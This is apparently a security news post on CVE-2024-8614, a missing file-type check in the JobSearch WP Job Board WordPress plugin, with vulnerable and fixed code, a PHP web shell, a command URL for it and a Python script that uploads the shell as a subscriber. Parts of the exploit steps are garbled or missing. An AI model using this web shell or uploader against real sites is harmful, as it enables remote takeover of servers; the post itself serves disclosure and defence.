CVE CyberSecurity Database News

CVE-2024-8614 - How JobSearch WP Job Board Plugin’s File Upload Flaw Can Let Attackers Run Code on Your WordPress Site

Poster -

If you run a job board using WordPress, you might use the popular JobSearch WP Job Board plugin, trusted by thousands to manage listings and job applications. In early 2024, a critical security vulnerability was discovered in this plugin, tracked as CVE-2024-8614. This flaw allows even low-privileged users—like basic subscribers—to upload any type of file to your website, opening up the possibility for hackers to run malicious code right on your server.

In this post, I’ll walk you through the nitty-gritty of CVE-2024-8614. We'll cover why the problem occurs, what attackers can do with it, and show an example exploit—so you can protect your site or understand what needs fixing.

What is CVE-2024-8614?

CVE-2024-8614 is a vulnerability in the JobSearch WP Job Board plugin for WordPress (all versions up to 2.6.7) that fails to properly check the type of files users upload via the jobsearch_wp_handle_upload() function.

This lack of validation means an authenticated user (even with just “Subscriber” access) can upload any file—including dangerous scripts like PHP—that could let them take over your site.

Why is File Type Validation Important?

When you let users upload files (like resumes or job listings), you should only allow harmless files (like images or PDFs). If not, someone could upload a script that your webserver executes, leading to a total site compromise.

A Closer Look: The Vulnerable Code

Let's look at a simplified version of how the vulnerability happens in code.

Vulnerable Code Snippet (Simplified)

// File: inc/class-jobsearch-upload.php (simplified pseudo-code)

public function jobsearch_wp_handle_upload($file) {
    // BAD: No file type (MIME) or extension check!

    // Move file to uploads directory
    $upload_dir = wp_upload_dir();

    // Save the file as-is (could even be .php!)
    move_uploaded_file($file['tmp_name'], $upload_dir['path'] . '/' . $file['name']);

    // ... no checks on file type or extension
}

What’s missing:
There are no checks on the file extension (.php, .exe, etc.) or the MIME type. This means attackers can upload scripts.

A safe version might use WordPress’s own file type checking

// Good: validate file extensions
$allowed = array('pdf', 'docx', 'png', 'jpg');
$file_ext = pathinfo($file['name'], PATHINFO_EXTENSION);

if (!in_array(strtolower($file_ext), $allowed)) {
    // Reject the upload!
    return new WP_Error('file_type', 'Invalid file type!');
}

But in versions up to 2.6.7, such a check is missing.

Log in to the site as a user (register an account if open).

2. Find an upload form made available by the JobSearch plugin (e.g., upload resume, job attachment, etc.)

evil.php (malicious payload example)

<?php
// A very simple web shell!
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

`

http://victim.com/wp-content/uploads/jobsearch/evil.php?cmd=whoami

Here’s a basic Python script that demonstrates the exploit (for educational use only)

import requests

url = "http://victim.com/wp-admin/admin-ajax.php";
username = "subscriberuser"
password = "password123"

# Step 1: Login (you'll need a session)
s = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': url,
    'testcookie': 1
}
s.post("http://victim.com/wp-login.php";, data=login_data)

# Step 2: Upload PHP file
files = {
    'file': ('evil.php', "<?php system($_GET['cmd']); ?>", 'application/x-php'),
}
payload = {
    'action': 'jobsearch_upload_resume_cv'
}
r = s.post(url, data=payload, files=files)

print("Upload status:", r.text)
# Check where evil.php is saved, then use browser to run commands.

Who Is Affected?

All versions of JobSearch WP Job Board up to 2.6.7
Any WordPress site using these versions is vulnerable, unless you’ve specifically blocked script uploads elsewhere.

Harden your server

Stop PHP execution in the uploads directory (e.g., add an .htaccess file with php_flag engine off).

References & Further Reading

- Wordfence Advisory: CVE-2024-8614
- NVD Database Entry
- Plugin Homepage (WordPress.org)

Conclusion

CVE-2024-8614 is a critical security bug that can let almost any user upload and execute malicious code on your WordPress server. If you’re running JobSearch WP Job Board, update ASAP—and review your other plugins for similar upload vulnerabilities.

Have questions or need help securing your WordPress site? Drop a comment below. And remember: don’t leave your doors open for hackers—keep everything patched!


*This post is exclusive, written in clear terms for site owners, researchers, and defenders. Please use this knowledge responsibly.*

Timeline

Published on: 11/06/2024 09:15:04 UTC
Last modified on: 11/08/2024 20:23:41 UTC